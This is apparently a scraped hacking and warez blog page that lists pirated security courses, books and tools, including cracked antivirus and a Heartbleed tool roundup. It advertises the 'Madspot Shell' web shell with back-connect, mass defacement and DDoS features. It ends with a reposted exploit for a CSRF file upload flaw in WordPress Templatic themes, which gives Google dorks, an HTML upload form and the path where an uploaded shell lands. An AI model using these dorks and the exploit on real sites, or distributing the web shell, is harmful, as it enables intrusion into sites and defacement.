The long awaited Kali Linux USB EFI boot support feature has been added to our binary ISO builds, which has prompted this early Kali Linux 1.0.8 release. This new feature simplifies getting Kali installed and running on more recent hardware which requires EFI as well as various Apple Macbooks Air and Retina models. Besides the addition of EFI support, there is a whole array of tool updates and fixes that have accumulated over the past couple of months.

As this new release focuses almost entirely on the EFI capable ISO image, Offensive Security won’t be releasing additional ARM or VMWare images with 1.0.8. As usual, you don’t need to re-download Kali if you’ve got it installed, and apt-get update && apt-get dist-upgrade should do the job.

[Kali 1.0.8]

Udemy - Metasploit Extreme on Kali Linux
English | .MP4 | Audio: aac, 44100 Hz, stereo | Video: h264, yuv420p, 642x360, 30.00 fps(r) | 499 MB

The re-engineered Metasploit Framework on Kali linux for Hackers and Penetration testers
Metaspoit Framework is a open source penetration tool used for developing and executing exploit code against a remote target machine it, Metasploit frame work has the world's largest database of public, tested exploits. In simple words, Metasploit can be used to test the Vulnerability of computer systems in order to protect them and on the other hand it can also be used to break into remote systems. Its a powerful tool used for penetration testing.
In clear and short words, If you interested in words like security, Hacking, exploits etc, then this is a must series for you.

Download:
Part 1
Part 2
Part 3
Part 4 

CISP is a trademark certification and is globally recognized.
“Includes the training on Backtrack Operating System”
Course Instructor :  Hitesh Choudhary 
This course is ideal for penetration testers, security enthusiasts and network administrators. The course leading to the certification exam is entirely practical and hands-on in nature. The final certification exam is fully practical as well and tests the student’s ability to think out of the box and is based on the application of knowledge in practical real life scenarios.
On an average,  NASSCOM predicts requirement of 10lakhs professionals by the year 2010. Currently the number of security professionals in India is around 22,000 and the applicants for the same are less than 1000.
The goal of this course is to help you master an ethical hacking methodology as a professional, starting from the scratch that can be used in a penetration testing or ethical hacking situation. You walk out the door with hacking skills that are highly in demand, as well as the internationally recognized Certified Information Security Professional certification!
“The bottom line with this program is that we hope the work starts when the class is over. Practical knowledge is always tested n same is provided here ”

[+Download+]
part 1
part 2
part 3
part 4
part 5
part 6
part 7
part 8
part 9
part 10
part 11
part 12

SQL Injection is one of oldest and powerful threat to Web application, yet there is no great explanation to solve the problem and a hands on guide to master SQL Injection. In this course you will learn to design your own challenges along with the guidance to hack into those custom created sites for pentesting purposes.
If you are a Pentester or Hacker or Developer or Information Security enthusiastic, you will love this course for sure. So, No theories Just practical Videos to learn. Jump in into the course to get more.

Download: Solidfiles Mediafire Torrent 

The purpose of this tool is to automate the manual, uncreative part of pen testing: For example, spending time trying to remember how to call "tool X", parsing results of "tool X" manually to feed "tool Y", etc.

By reducing this burden I hope pen testers will have more time to:

• See the big picture and think out of the box
• More efficiently find, verify and combine vulnerabilities
• Have time to investigate complex vulnerabilities like business logic/architectural flaws or virtual hosting sessions
• Perform more tactical/targeted fuzzing on seemingly risky areas
• Demonstrate true impact despite the short timeframes we are typically given to test.

Some features like the passive and semi_passive test separation may also assist pen testers wishing to go the extra mile to get a head start and maybe even legitimately start report writing or preparing attacks before they are given the green light to test.

The tool is highly configurable and anybody can trivially create simple plugins or add new tests in the configuration files without having any development experience. Please share your tests with the community! :)

This tool is however not a silverbullet and will only be as good as the person using it: Understanding and experience will be required to correctly interpret tool output and decide what to investigate further in order to demonstrate impact.

Features

• OWASP Testing Guide-oriented: owtf will try to classify the findings as closely as possible to the OWASP Testing Guide
• Report updated on the fly: As soon as each plugin finishes or sometimes before (i.e. after each vulnerability scanner finishes)
• "Scumbag spidering": Instead of implementing yet another spider (a hard job), owtf will scrub the output of all tools/plugins run to gather as many URLs as possible. This is somewhat "cheating" but tremendously effective since it combines the results of different tools, including several tools that perform brute forcing of files and directories.
• Resilience: If one tool crashes owtf will move on to the next tool/test, saving the partial output of the tool until it crashed
• Easy to configure: config files are easy to read and modify
• Easy to run: No strange parameters, DB setup requirements, libraries, complex dependencies, etc
• Full control of what tests to run, interactivity and hopefully easy to follow examples and help :)
• Easy to review transaction logs and plain text files with URLs, simple for scripting
• Basic Google Hacking without (annoying) API Key requirements via "blanket searches", trying a bunch of operators at once, you can then narrow the search down if you find something interesting.
• Easy to extract data from the database to parse or pass to other tools: They are all text files

Requirements

• Linux (any Ubuntu derivative should work just fine) and python 2.6.5 or greater
• Latest Kali version not required but helpful (almost 0 setup time)
• You do NOT have to have all tools installed: owtf will move on with an error for the missing tools

[Download]

Kali linux 1.0.7 has just been released, complete with a whole bunch of tool updates, a new kernel, and some cool new features. Check out our changelog for a full list of these items. As usual, you don’t need to re-download or re-install Kali to benefit from these updates – you can update to the latest and greatest using these simple commands:

apt-get update
apt-get dist-upgrade
# If you've just updated your kernel, then:
reboot

Kali Linux Encrypted USB Persistence

One of the new sought out features introduced (which is also partially responsible for the kernel update) is the ability to create Kali Linux Live USB with LUKS Encrypted Persistence. This feature ushers in a new era of secure Kali Linux USB portability, allowing us to either boot to a “clean” Kali image or alternatively, overlay it with the contents of a persistent encrypted partition, all within the same USB drive.

Tool Developers Ahoy!

This release also marks the beginning of some co-ordinated efforts between Kali developers and tool developers to make sure their tools are represented correctly and are fully functional within Kali Linux. We would like to thank the metasploit, w3af, and wpscan dev teams for working with us to perfect their Kali packages and hope that more tool developers join in. Tool developers are welcome to send us an email to and we’ll be happy to work with you to better integrate your tool into Kali.

Kali Linux: Greater Than the Sum of its Parts

For quite some time now, we’ve been preaching that Kali Linux is more than a “Linux distribution with a collection of tools in it”. We invest a significant of time and resources developing and enabling features in the distribution which we think are useful for penetration testers and other security professionals. These features range from things like “live-build“, which allows our end users to easily customize their own Kali ISOs to features like Live USB persistence encryption, which provides paranoid users with an extra layer of security. Many of these features are unique to Kali and can be found nowhere else. We’ve started tallying these features and linking them from our Kali documentation page – check it out, it’s growing to be an impressive list!

[Download]

Tools used for penetration testing are often purchased or downloaded from the Internet. Each tool is based on a programming language such as Perl, Python, or Ruby. If a penetration tester wants to extend, augment, or change the functionality of a tool to perform a test differently than the default configuration, the tester must know the basics of coding for the related programming language. Coding for Penetration Testers provides the reader with an understanding of the scripting languages that are commonly used when developing tools for penetration testing. It also guides the reader through specific examples of custom tool development and the situations where such tools might be used. While developing a better understanding of each language, the reader is guided through real-world scenarios and tool development that can be incorporated into a tester's toolkit.

[Download]

Sybex is now the official publisher for Certified Wireless Network Professional, the certifying vendor for the CWSP program. This guide covers all exam objectives, including WLAN discovery techniques, intrusion and attack techniques, 802.11 protocol analysis. Wireless intrusion-prevention systems implementation, layer 2 and 3 VPNs used over 802.11 networks, and managed endpoint security systems. It also covers enterprise/SMB/SOHO/Public-Network Security design models and security solution implementation, building robust security networks, wireless LAN management systems, and much more.

[Download]

Table of Contents
Preface
Chapter 1: Getting Started with Client-Side Endpoint Protection Tasks
Chapter 2: Planning and Rolling Installation
Chapter 3: SCEP Configuration
Chapter 4: Client Deployment Preparation and Deployment
Chapter 5: Common Tasks
Chapter 6: Management Tasks
Chapter 7: Reporting
Chapter 8: Troubleshooting
Chapter 9: Building an SCCM 2012 Lab
Appendix
Index

[Download]

Table of Contents
Preface
Chapter 1: Getting Started with Firebug
Chapter 2: Firebug Window Overview
Chapter 3: Inspecting and Editing HTML
Chapter 4: CSS Development
Chapter 5: JavaScript Development
Chapter 6: Knowing Your DOM
Chapter 7: Performance Tuning Our Web Application
Chapter 8: AJAX Development
Chapter 9: Tips and Tricks for Firebug
Chapter 10: Necessary Firebug Extensions
Chapter 11: Extending Firebug
Appendix: A Quick Overview of Firebug's Features and Options
Index

[Download]

Many Unix, Linux, and Mac OS X geeks enjoy using the powerful, platform-agnostic text editors vi and Vim, but there are far too many commands for anyone to remember. Author Arnold Robbins has chosen the most valuable commands for vi, Vim, and vi's main clones-vile, elvis, and nvi-and packed them into this easy-to-browse pocket reference. You'll find commands for all kinds of editing tasks, including programming, modifying system files, writing and marking up articles, and more.

[Download]

What if you could sit down with some of the most talented security engineers in the world and ask any network security question you wanted? Security Power Tools lets you do exactly that! Members of Juniper Networks' Security Engineering team and a few guest experts reveal how to use, tweak, and push the most popular network security applications, utilities, and tools available using Windows, Linux, Mac OS X, and Unix platforms.

Designed to be browsed, Security Power Tools offers you multiple approaches to network security via 23 cross-referenced chapters that review the best security tools on the planet for both black hat techniques and white hat defense tactics. It's a must-have reference for network administrators, engineers and consultants with tips, tricks, and how-to advice for an assortment of freeware and commercial tools, ranging from intermediate level command-line operations to advanced programming of self-hiding exploits.

[Download]

[Amazon review]
Google's Android is shaking up the mobile market in a big way. With Android, you can write programs that run on any compatible cell phone or tablet in the world. It's a mobile platform you can't afford not to learn, and this book gets you started. Hello, Android has been updated to Android 2.3.3, with revised code throughout to reflect this updated version. That means that the book is now up-to-date for tablets such as the Kindle Fire. All examples were tested for forwards and backwards compatibility on a variety of devices and versions of Android from 1.5 to 4.0. (Note: the Kindle Fire does not support home screen widgets or wallpaper, so those samples couldn't be tested on the Fire.)

Android is an operating system for mobile phones and tablets. It's inside millions of cell phones and other devices, including the hugely popular Amazon Kindle Fire, making Android the foremost platform for mobile application developers. That could be your own program running on all those devices.

Within minutes, Hello, Android will get you started creating your first working application: Android's version of "Hello, World." From there, you'll build up a more substantial example: an Android Sudoku game. By gradually adding features to the game, you'll learn the basics of Android programming. You'll also see how to build in audio and video support, add graphics using 2D and 3D OpenGL, network with web pages and web services, and store data with SQLite. You'll also learn how to publish your applications to the Android Market.

The #1 book for learning Android is now in its third edition. Every page and example was reviewed and updated for compatibility with the latest versions. Freshly added material covers installing applications to the SD card, supporting multi-touch, and creating live wallpaper. You'll also find plenty of real-world advice on how to support all major Android versions in use today.

[Download]

This book is written for beginner analysts and includes 46 step-by-step labs to walk you through many of the essential skills contained herein. This book provides an ideal starting point whether you are interested in analyzing traffic to learn how an application works, you need to troubleshoot slow network performance, or determine whether a machine is infected with malware.

[Download]

Table of Contents

Preface
Chapter 1: Getting Started with Vim
Chapter 2: Personalizing Vim
Chapter 3: Better Navigation
Chapter 4: Production Boosters
Chapter 5: Advanced Formatting
Chapter 6: Basic Vim Scripting
Chapter 7: Extended Vim Scripting
Appendix A: Vim Can Do Everything
Appendix B: Vim Configuration Alternatives
Index

[Download]

The Handbook of Digital Forensics and Investigation builds on the success of the Handbook of Computer Crime Investigation, bringing together renowned experts in all areas of digital forensics and investigation to provide the consummate resource for practitioners in the field.
This unique collection details how to conduct digital investigations in both criminal and civil contexts, and how to locate and utilize digital evidence on computers, networks, and embedded systems. Specifically, the Investigative Methodology section of the Handbook provides expert guidance in the three main areas of practice: Forensic Analysis, Electronic Discovery and Intrusion Investigation. The Technology section is extended and updated to reflect the state of the art in each area of specialization. The main areas of focus in the Technology section are forensic analysis of Windows, Unix, Macintosh, and embedded systems (including cellular telephones and other mobile devices), and investigations involving networks (including enterprise environments and mobile telecommunications technology).
[Download]

If you've asked someone the secret to writing efficient, well-written software, the answer that you've probably gotten is "learn assembly language programming." By learning assembly language programming, you learn how the machine really operates and that knowledge will help you write better high-level language code. A dirty little secret assembly language programmers rarely admit to, however, is that what you really need to learn is machine organization, not assembly language programming. Write Great Code Vol I, the first in a series from assembly language expert Randall Hyde, dives right into machine organization without the extra overhead of learning assembly language programming at the same time. And since Write Great Code Vol I concentrates on the machine organization, not assembly language, the reader will learn in greater depth those subjects that are language-independent and of concern to a high level language programmer. Write Great Code Vol I will help programmers make wiser choices with respect to programming statements and data types when writing software, no matter which language they use.

[Volume 1]  [Volume 2]

Passionately democratic in its advocacy of networking for the masses, this is the first book on Linux networking written especially for the novice user. Because the free, open-source Linux operating system is winning so many converts today, the number of Linux-based networks will grow exponentially over the next few years. Taking up where Linux Clearly Explained left off, Linux Networking Clearly Explained walks the reader through the creation of a TCP/IP-based, Linux-driven local area network, beginning with a "sandbox" installation involving just two or three computers. Readers master the fundamentals of system and network administration-including handling user accounts and setting up security-in this less complex environment. The author then helps them along to the more sophisticated techniques associated with connecting this network to the Internet.
* Focuses on the 20% of Linux networking knowledge that satisfies 80% of network needs-including the needs of small businesses, workgroups within enterprises and high-tech homes.
* Teaches novices to implement DNS servers, network information services

[Download]

What can you do with the Raspberry Pi, a $35 computer the size of a credit card? All sorts of things! If you’re learning how to program, or looking to build new electronic projects, this hands-on guide will show you just how valuable this flexible little platform can be.
This book takes you step-by-step through many fun and educational possibilities. Take advantage of several preloaded programming languages. Use the Raspberry Pi with Arduino. Create Internet-connected projects. Play with multimedia. With Raspberry Pi, you can do all of this and more.

• Get acquainted with hardware features on the Pi’s board
• Learn enough Linux to move around the operating system
• Pick up the basics of Python and Scratch—and start programming
• Draw graphics, play sounds, and handle mouse events with the Pygame framework
• Use the Pi’s input and output pins to do some hardware hacking
• Discover how Arduino and the Raspberry Pi complement each other
• Integrate USB webcams and other peripherals into your projects
• Create your own Pi-based web server with Python.

[Download]

The real challenge of programming isn't learning a language's syntax—it's learning to creatively solve problems so you can build something great. In this one-of-a-kind text, author V. Anton Spraul breaks down the ways that programmers solve problems and teaches you what other introductory books often ignore: how to Think Like a Programmer. Each chapter tackles a single programming concept, like classes, pointers, and recursion, and open-ended exercises throughout challenge you to apply your knowledge. You'll also learn how to:

• Split problems into discrete components to make them easier to solve
• Make the most of code reuse with functions, classes, and libraries
• Pick the perfect data structure for a particular job
• Master more advanced programming tools like recursion and dynamic memory
• Organize your thoughts and develop strategies to tackle particular types of problems

Although the book's examples are written in C++, the creative problem-solving concepts they illustrate go beyond any particular language; in fact, they often reach outside the realm of computer science. As the most skillful programmers know, writing great code is a creative art—and the first step in creating your masterpiece is learning to Think Like a Programmer.

[Download]

Acunetix Web Vulnerability Scanner (WVS) is an automated web application security testing tool that audits your web applications by checking for exploitable hacking vulnerabilities. Automated scans may be supplemented and cross-checked with the variety of manual tools to allow for comprehensive web site and web application penetration testing.

This week the latest version was released, Acunetix Vulnerability Scanner 9.5.

Features

• AcuSensor Technology
• Industry’s most advanced and in-depth SQL injection and Cross site scripting testing
• Advanced penetration testing tools, such as the HTTP Editor and the HTTP Fuzzer
• Visual macro recorder makes testing web forms and password protected areas easy
• Support for pages with CAPTCHA, single sign-on and Two Factor authentication mechanisms
• Extensive reporting facilities including PCI compliance reports
• Multi-threaded and lightning fast scanner – processes thousands of pages with ease
• Intelligent crawler detects web server type, application language and smartphone-optimized sites.
• Acunetix crawls and analyzes different types of websites including HTML5, SOAP and AJAX
• Port scans a web server and runs security checks against network services running on the server

This new release adds the ability to run security scans on applications built with Google Web Toolkit (GWT). It can also automatically test JSON and XML data objects for vulnerabilities. In addition, vulnerabilities are now also classified using CVE, CWE and CVSS, and AcuSensor has been updated for .NET 4.5 web applications.

Download Acunetix Vulnerability Scanner 9.5

Protect your business. Protect your customers. Here's how: websites built on open source Content Management Systems (CMSs) are uniquely vulnerable. If you are responsible for maintaining one, or if you are the executive or business owner in charge of approving IT budgets, you need to know what's in this book. Here's the lowdown on very real security threats, how attacks are carried out, what security measures you need to take, and how to compile a disaster recovery plan. Don't wait. Your business may depend on the action you take.

2011 | 432 Pages | ISBN: 0470916214 | EPUB | 14 MB

[Download]

[Download]

• A checker (site and tool) for CVE-2014-0160: https://github.com/FiloSottile/Heartbleed
• ssltest.py: Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford http://pastebin.com/WmxzjkXJ
• SSL Server Test https://www.ssllabs.com/ssltest/index.html
• Metasploit Module: https://github.com/rapid7/metasploit-framework/pull/3206/files
• Nmap NSE script: Detects whether a server is vulnerable to the OpenSSL Heartbleed: https://svn.nmap.org/nmap/scripts/ssl-heartbleed.nse
• Nmap NSE script: Quick'n'Dirty OpenVAS nasl wrapper for ssl_heartbleed based on ssl_cert_expiry.nas https://gist.github.com/RealRancor/10140249
• Heartbleeder: Tests your servers for OpenSSL: https://github.com/titanous/heartbleeder?files=1
• Heartbleed Attack POC and Mass Scanner: https://bitbucket.org/fb1h2s/cve-2014-0160
• Heartbleed Honeypot Script: http://packetstormsecurity.com/files/126068/hb_honeypot.pl.txt

Credit: http://hack-tools.blackploit.com/2014/04/collection-of-heartbleed-tools-openssl.html

The Heartbleed Bug is a serious vulnerability in the popular OpenSSL cryptographic software library. This weakness allows stealing the information protected, under normal conditions, by the SSL/TLS encryption used to secure the Internet. SSL/TLS provides communication security and privacy over the Internet for applications such as web, email, instant messaging (IM) and some virtual private networks (VPNs).
The Heartbleed bug allows anyone on the Internet to read the memory of the systems protected by the vulnerable versions of the OpenSSL software. This compromises the secret keys used to identify the service providers and to encrypt the traffic, the names and passwords of the users and the actual content. This allows attackers to eavesdrop on communications, steal data directly from the services and users and to impersonate services and users.
Read more at http://heartbleed.com/

Madspot Shell 1.0 Have Following Features:
Madspot shell works both on Windows and Linux OS.
- Process
- Eval
- SQL
- Hash
- Perl and PHP Back Connect
- Zone-h mass defacer
- Powerfull DDOS tool
- Auto Safe mood Off
- Whole Server Auto Symlink
- Perl 500 Internal Error Bypass
- Killcode

[Download]
Pass=http://madspot.net

What is Malwr?

Malwr is a free malware analysis service and community launched in January 2011. You can submit files to it and receive the results of a complete dynamic analysis back.

Mission

Existing online analysis services are all based on closed and commercial technologies, often with intents to leverage people's data to own profit and with no real transparency on how the data is being used. We are researchers ourselves and felt the need of an alternative solution.
Our mission is to provide a powerful, free, independent and non-commercial service to the security community, independent or academic researchers with no other goal than facilitating everyone's daily work and give a contribution to the community.

Independent

Malwr is operated by volunteer security professionals with the exclusive intent to help the community. It's not associated or influenced by any commercial or government organization of any sort.

Non-Commercial

We do not profit on your data. The files you submit, the information you provide and any other use you make of the website is not commercialized in any way. We create and use open source technology. We're not advertising any commercial product, we are not collecting data to enrich any existing product.

Privacy

Unless you specify otherwise, the files you submit are not shared outside. While we believe in the value of sharing within our community and the larger public, we do strongly believe in respecting your privacy and the confidentiality of the data you handle.
We really invite you to read our Terms of Service for "detailed" "policies".

[Malware Analysis by Cuckoo Sandbox]

Web Application Vulnerabilities: Detect, Exploit, Prevent �Web Application Vulnerabilities: Detect, Exploit, Prevent� Syngress | 2007 | ISBN: 1597492094 9781597492096 9780080556642 | 476 pages | PDF | 17 MB This book describes how to make a computer bend to your will by finding and exploiting vulnerabilities specifically in Web applications. The book describes common security issues in Web applications, tells you how to find them, describes how to exploit them, and then tells you how to fix them. The book covers how and why some hackers (the bad guys) will try to exploit these vulnerabilities to achieve their own end. Author explains how to detect if hackers are actively trying to exploit vulnerabilities in your own Web applications. � Learn to defend Web-based applications developed with AJAX, SOAP, XMLPRC, and more. � See why Cross Site Scripting attacks can be so devastating. Contents Chapter 1 : Introduction to Web Application Hacking Introduction Web Application Architecture Components Complex Web Application Software Components Putting it all Together The Web Application Hacking Methodology The History of Web Application Hacking and the Evolution of Tools Summary Chapter 2 : Information Gathering Techniques Introduction The Principles of Automating Searches Applications of Data Mining Collecting Search Terms Summary Chapter 3 : Introduction to Server Side Input Validation Issues Introduction Cross Site Scripting (XSS) Chapter 4 : Client-Side Exploit Frameworks Introduction AttackAPI BeEF CAL9000 Overview of XSS-Proxy Summary Solutions Fast Track Frequently Asked Questions Chapter 5 : Web-Based Malware Introduction Attacks on the Web Hacking into Web Sites Index Hijacking DNS Poisoning (Pharming) Malware and the Web: What, Where, and How to Scan Parsing and Emulating HTML Browser Vulnerabilities Testing HTTP-scanning Solutions Tangled Legal Web Summary Solutions Fast Track Frequently Asked Questions Chapter 6 : Web Server and Web Application Testing with BackTrack Objectives Introduction Approach Core Technologies Open Source Tools Case Studies: The Tools in Action Chapter 7 : Securing Web Based Services Introduction Web Security Instant Messaging Web-based Vulnerabilities Buffer Overflows Making Browsers and E-mail Clients More Secure Securing Web Browser Software CGI Break-ins Resulting from Weak CGI Scripts FTP Security Directory Services and LDAP Security Summary Solutions Fast Track Frequently Asked Questions Index Web Application Vulnerabilities: Detect, Exploit, Prevent  
[Download]

Salted Hash Kracker is the free all-in-one tool to recover the Password from Salted Hash text. These days most websites and applications use salt based hash generation to prevent it from being cracked easily using precomputed hash tables such as Rainbow Crack. In such cases, 'Salted Hash Kracker' will help you to recover the lost password from salted hash text.

It also allow you to specify the salt position either in the beginning of password(salt+password) or at the end of the password (password+salt). In case you want to perform normal hash cracking without the salt then just leave the 'Salt field' blank.

Currently it supports password recovery from following popular Hash types

• MD5
• SHA1
• SHA256
• SHA384
• SHA512

It uses dictionary based cracking method which makes the cracking operation simple and easier. You can find good collection of password dictionaries (also called wordlist) here & here

It is fully portable and works on all Windows platforms starting from Windows XP to Windows 8.

[Download]

A tool to help developers and security professionals conduct manual security code reviews in a consistent and repeatable way. Agnitio aims to replace the adhoc nature of manual security code review documentation, create an audit trail and reporting.

Features

• Security code reviews
• Security code review metrics and reporting
• Application security code review tool
• Static analysis security guidance and reporting

[Download]

Description

This program is a scanner that helps detect and delete virus such as "MyDoom, Sasser, etc", created with custom engine developed by VirAtt Viruslab this program fastly detect, delete, and destroy process file of the virus itself including fixing registry error caused by the virus.

Features

• Destroy Worm Process (Mydoom, Sasser, etc.)
• Super small process and file
• Delete virus and worm file in system directory
• Fix Registry errors caused by the virus
• Unhide windows function (Task Manager, MSConfig, etc)

[Download]

The problem that we experienced in the past was the difficulty to exchange information about (targeted) malwares and attacks within a group of trusted partners, or a bilateral agreement. Even today much of the information exchange happens in unstructured reports where you have to copy-paste the information in your own text-files that you then have to parse to export to (N)IDS and systems like log-searches, etc…

A huge challenge in the Cyber Security domain is the information sharing inside and between organizations. This platform has as goal to facilitate:

• central IOC database: storing technical and non-technical information about malwares and attacks, … Data from external instances is also imported into your local instance
• correlation: automatically creating relations between malwares, events and attributes
• storing data in a structured format (allowing automated use of the database for various purposes)
• export: generating IDS, OpenIOC, plain text, xml output to integrate with other systems (network IDS, host IDS, custom tools, …)
• import: batch-import, import from OpenIOC, GFI sandbox, ThreatConnect CSV, …
• data-sharing: automatically exchange and synchronization with other parties and trust-groups

Exchanging info results in faster detection of targeted attacks and improves the detection ratio while reducing the false positives. We also avoid reversing similar malware as we know very fast that others already worked on this malware.

[Download]

Adobe Malware Classifier is a command-line tool that lets antivirus analysts, IT administrators, and security researchers quickly and easily determine if a binary file contains malware, so they can develop malware detection signatures faster, reducing the time in which users' systems are vulnerable.

Malware Classifier uses machine learning algorithms to classify Win32 binaries – EXEs and DLLs – into three classes: 0 for “clean,” 1 for “malicious,” or “UNKNOWN.”

The tool was developed using models resultant from running the J48, J48 Graft, PART, and Ridor machine-learning algorithms on a dataset of approximately 100,000 malicious programs and 16,000 clean programs. 

The tool extracts seven key features from an unknown binary, feeds them to one of the four classifiers or all of them, and presents its classification of the unknown binary.

[Download]

As the first company Avira Antivirus German, now able to market to a very good antivirus. Avira Internet Security antivirus offered by this company is one of the most powerful yet high-performance and show data, it can be considered one of the strongest available security package into account. The software of your computer against viruses, worms, Internet 's, Trojans, ad and spyware you, robots (Bots) and protects them from dangerous spyware. The important features of Avira Internet Security software uses very few system resources, settings and user interface is very simple scanner tool to prepare profiles, search for detection of malware, safety Mail POP3 and SMTP against viruses and malware powerful servers to download updates faster, at intervals specified by the user to update, complete security against phishing, rootkits and phishing attacks and security systems that are fully integrated.

A key feature of the software Avira Internet Security:
- Brabranva effective protection from viruses, Trojans, worms and other threats 
- effectively detect and remove rootkits 
- High scanning speed 
- new interface design graphics software 
- protect the system against attacks known as phishing 
- protection against all types of malware and spyware 
- Special protection against viruses for emails (POP 3) 
- Quickly update feature through Server Premium 
- emergency rescue system disc 
- saver for web browsing and Download Safe 
- Powerful embedded firewall software 
- anti-spam and passive AntiPhishing 
- performance to match data Abbey 
- being friendly 
- and ...

- Min. 150 MB available disk space 
- Min. 512 MB ??RAM (Windows XP) 
- Min. 1024th MB RAM (Windows Vista, Windows 7) 
- For all installations: Windows Internet Explorer 6.0 or higher 
- Administrator rights are required for the installation

1.Run setup file & install it.
2.Select offline activation & activate using key file

[Torrent Link]

Malheur is a tool for the automatic analysis of malware behavior (program behavior recorded from malicious software in a sandbox environment). It has been designed to support the regular analysis of malicious software and the development of detection and defense measures. Malheur allows for identifying novel classes of malware with similar behavior and assigning unknown malware to discovered classes.

Analysis of malware behavior?

Malheur builds on the concept of dynamic analysis: Malware binaries are collected in the wild and executed in a sandbox, where their behavior is monitored during run-time. The execution of each malware binary results in a report of recorded behavior. Malheur analyzes these reports for discovery and discrimination of malware classes using machine learning.

Malheur can be applied to recorded behavior of various format, as long as monitored events are separated by delimiter symbols, for example as in reports generated by the popular malware sandboxes CWSandbox, Anubis, Norman Sandbox and Joebox.

[Download]

Malcom is a tool designed to analyze a system's network communication using graphical representations of network traffic. This comes handy when analyzing how certain malware species try to communicate with the outside world.

Malcom can help you:

• detect central command and control (C&C) servers
• understand peer-to-peer networks
• observe DNS fast-flux infrastructures
• quickly determine if a network artifact is 'known-bad'

The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network. Convert network traffic information to actionable intelligence faster.
Check the wiki for a Quickstart and some nice screenshots.
In the near future, it will also become a collaborative tool (coming soon!)

[Download]

Watcher is a runtime passive-analysis tool for HTTP-based Web applications. Being passive means it won't damage production systems, it's completely safe to use in Cloud computing, shared hosting, and dedicated hosting environments. Watcher detects Web-application security issues as well as operational configuration issues. Watcher provides pen-testers hot-spot detection for vulnerabilities, developers quick sanity checks, and auditors PCI compliance auditing. It looks for issues related to mashups, user-controlled payloads (potential XSS), cookies, comments, HTTP headers, SSL, Flash, Silverlight, referrer leaks, information disclosure, Unicode, and more.

Major Features:

1. Passive detection of security, privacy, and PCI compliance issues in HTTP, HTML, Javascript, CSS, and development frameworks (e.g. ASP.NET, JavaServer)
2. Works seamlessly with complex Web 2.0 applications while you drive the Web browser
3. Non-intrusive, will not raise alarms or damage production sites
4. Real-time analysis and reporting - findings are reported as they’re found, exportable to XML, HTML, and Team Foundation Server (TFS)
5. Configurable domains with wildcard support
6. Extensible framework for adding new checks

Watcher is built as a plugin for the Fiddler HTTP debugging proxy available at www.fiddlertool.com. Fiddler provides all of the rich functionality of a good Web/HTTP proxy. With Fiddler you can capture all HTTP traffic, intercept and modify, replay requests, and much much more. Fiddler provides the HTTP proxy framework for Watcher to work in, allowing for seamless integration with today’s complex Web 2.0 or Rich Internet Applications. Watcher runs silently in the background while you drive your browser and interact with the Web-application.

Watcher is built in C# as a small framework with 30+ checks already included. It's built so that new checks can be easily created to perform custom audits specific to your organizational policies, or to perform more general-purpose security assessments. Examples of the types of issues Watcher will currently identify:

• ASP.NET VIEWSTATE insecure configurations
• JavaServer MyFaces ViewState without cryptographic protections
• Cross-domain stylesheet and javascript references
• User-controllable cross-domain references
• User-controllable attribute values such as href, form action, etc.
• User-controllable javascript events (e.g. onclick)
• Cross-domain form POSTs
• Insecure cookies which don't set the HTTPOnly or secure flags
• Open redirects which can be abused by spammers and phishers
• Insecure Flash object parameters useful for cross-site scripting
• Insecure Flash crossdomain.xml
• Insecure Silverlight clientaccesspolicy.xml
• Charset declarations which could introduce vulnerability (non-UTF-8)
• User-controllable charset declarations
• Dangerous context-switching between HTTP and HTTPS
• Insufficient use of cache-control headers when private data is concerned (e.g. no-store)
• Potential HTTP referer leaks of sensitive user-information
• Potential information leaks in URL parameters
• Source code comments worth a closer look
• Insecure authentication protocols like Digest and Basic
• SSL certificate validation errors
• SSL insecure protocol issues (allowing SSL v2)
• Unicode issues with invalid byte streams
• Sharepoint insecurity checks
• more….

[Download]

Hydra is a parallelized network logon cracker which supports numerous protocols to attack, new modules are easy to add, beside that, it is flexible and very fast.

Features

• IPv6 Support
• Graphic User Interface
• Internationalized support (RFC 4013)
• HTTP proxy support
• SOCKS proxy support

The tool supports the following protocols:

Samba, FTP, POP3, IMAP, Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco and more.

[Download]

PACK (Password Analysis and Cracking Toolkit) is a collection of utilities developed to aid in analysis of password lists in order to enhance password cracking through pattern detection of masks, rules, character-sets and other password characteristics. The toolkit generates valid input files for Hashcat family of password crackers.

NOTE: The toolkit itself is not able to crack passwords, but instead designed to make operation of password crackers more efficient.

[Download]

#Title : Wordpress Templatic Themes CSRF File Upload Vulnerability [Monetize Uploader]

#Author : Jje Incovers

#Date : 31/03/2014

#Category : Web Applications

#Type : PHP

#Vendor : http://templatic.com/

#Download : http://templatic.com/wordpress-themes-store/

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : CSRF

 

#Dork :

inurl:/wp-content/themes/Realestate/

inurl:/wp-content/themes/dailydeal/

inurl:/wp-content/themes/nightlife/

inurl:/wp-content/themes/5star/

inurl:/wp-content/themes/specialist/

 

CSRF File Upload Vulnerability

 

Exploit & POC : http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php

 

<html>

<body>

<center>

<form method="post" enctype="multipart/form-data" action="http://site-target/wp-content/themes/Realestate/Monetize/general/upload-file.php

">

 

<br>

</br>

<input name="uploadfile[]" type="file" />

 

<br>

<input type="submit" value="upload" />

</form>

</center>

</body>

</html>

 

File Access :

http://site-target/wp-content/themes/Realestate/images/tmp/your_shell.php

 

Note :

Script CSRF equate with dork you use

 

########################################

#Greetz : SANJUNGAN JIWA , All Indonesian H4xor

#Thanks : All member SANJUNGAN JIWA , Co-p1r3 , Jje Incovers , MrTieDie , Ice-Cream ,

########################################

 

# 90952935D5011A31   1337day.com [2014-04-03]   69BF4D7EF87E2E8E #




http://1337day.com/exploit/22091